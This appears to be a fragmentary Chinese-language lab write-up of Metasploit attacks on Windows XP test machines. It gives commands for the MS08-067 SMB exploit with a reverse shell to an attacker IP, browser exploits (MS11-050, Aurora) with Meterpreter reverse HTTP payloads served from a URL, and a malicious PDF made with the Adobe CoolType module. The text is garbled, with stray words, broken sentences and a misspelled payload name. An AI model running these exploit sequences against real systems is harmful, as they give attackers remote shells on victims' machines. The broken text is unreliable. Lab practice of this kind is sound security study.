use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcptcp反向回連 set LHOST 192.168.124.132 set LPORT 5330 端口 set RHOST 192.168.124.135 set target 0
exploit
。成功了,使用systeminfo
查看靶機信息。
html
use windows/browser/ms11_050_mshtml_cobjectelement
使用該模塊set payload windows/meterpreter/reverese_http
,並設置相應參數,打開服務exploit,發起滲透攻擊。http://192.168.124.132:8080/ms5330
;而後參考組長的博客,將攻擊的目標漏洞換成了MS10_002_aurora
。shell
http://192.168.124.132:8080/aurora.html
;sysinfo
查看靶機信息靶機ip地址
windows
windows/fileformat/adobe_cooltype_sing
模塊設定相關係數並生成相關文件5330.pdf
在靶機中關閉PDF文檔後,攻擊機與靶機斷開鏈接。
api
show auxiliary
查看全部輔助模塊show options
查看須要設置的消息使用命令run開啓掃描,結果以下:
瀏覽器
此次實驗主要對Windows xp系統及其有關應用中的部分漏洞進行了攻擊,從而也感覺到了msf工具功能的強大。安全